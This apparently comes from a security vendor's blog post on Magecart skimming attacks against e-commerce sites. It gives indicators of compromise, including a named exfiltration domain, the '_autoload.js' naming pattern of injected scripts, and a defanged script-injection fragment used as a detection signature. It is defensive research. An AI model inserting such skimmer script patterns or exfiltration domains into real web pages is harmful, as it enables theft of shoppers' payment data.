Magecart is a name used for a group of threat actors utilizing a family of malicious supply-chain attacks or application exploits that target ecommerce systems. Magecart has gained notoriety and made headlines in the past year after a number of high-profile attacks. Alert Logic threat researchers have monitored activity related to the Magecart threat actor campaigns—tracking behavior and identifying related tools, techniques and procedures over the past year.
Magecart Indicators of Compromise
Note: We have placed brackets  around the dot in domain names to ensure they cannot be inadvertently clicked.
Building on the comprehensive work done by an array of cybersecurity vendors and professionals—especially RiskIQ and gwillem—we’ve been tracking domains and IP addresses by the threat actors to exfiltrate data. During that time, our researchers and Security Operations Center (SOC) analysts have also actively observed successful data extraction. We’ve identified several additional Indicators of Compromise (IOC) that demonstrate how attackers continue to adapt and evolve their behavior to avoid threat detection.
Successful Magecart Attacks
The data exfiltration we observed was interesting because we initially caught the plain text exfiltration, and then saw the attacker move the channel to HTTPS. During our code analysis of [customer_domain]_autoload.js we found that the domain for exfiltration was changed from verpayment to secureqbrowser[.].com. The deeper investigation into Magecart activity allowed us to release a new telemetry rule to track communications with this domain.
We noticed that the script name was made up of the compromised site domain and autoload.js. Using this knowledge allowed us to actively scan the attacker infrastructure for any other domains that could be assumed to be compromised. Starting with top million domains identified by Alexa, we were able to identify 5 new samples and multiple compromised sites in the wild. Once the method was proven we collated a list of known Alert Logic customer domains and compared it to the list of known compromised domains to evaluate the risk for our customers.
Monitoring for Magecart Activity
In order to proactively identify Alert Logic customers who may be running a website which has been compromised by Magecart threat actors, we have been actively scanning sets of our customer websites for the presence of the following code. Our research indicates that this code correlates to a high probability that the host has been compromised:
true; po[.]src = '//magecart_mal_domain;
This should be correlated with suspicious modified dates of individual .js resources compared to other files on the system
One of the more fruitful mechanisms to detect Magecart successfully relies on the attacker embedding a known malicious script (and in some cases Command & Control (C&C)) in the webpage's HTML. Detecting the presence of the domain string on the page being returned to the client can therefore infer compromise. However, the number of cases which exhibit this behavior are on the decrease as an increasing amount of the data exfiltration is being executed on the client side. Keeping pace with threat actors of this type, who continue to innovate their tactics, requires OSINT and large-scale data analysis married with the ability to release and analyze coverage quickly. You have to strike while the iron is hot.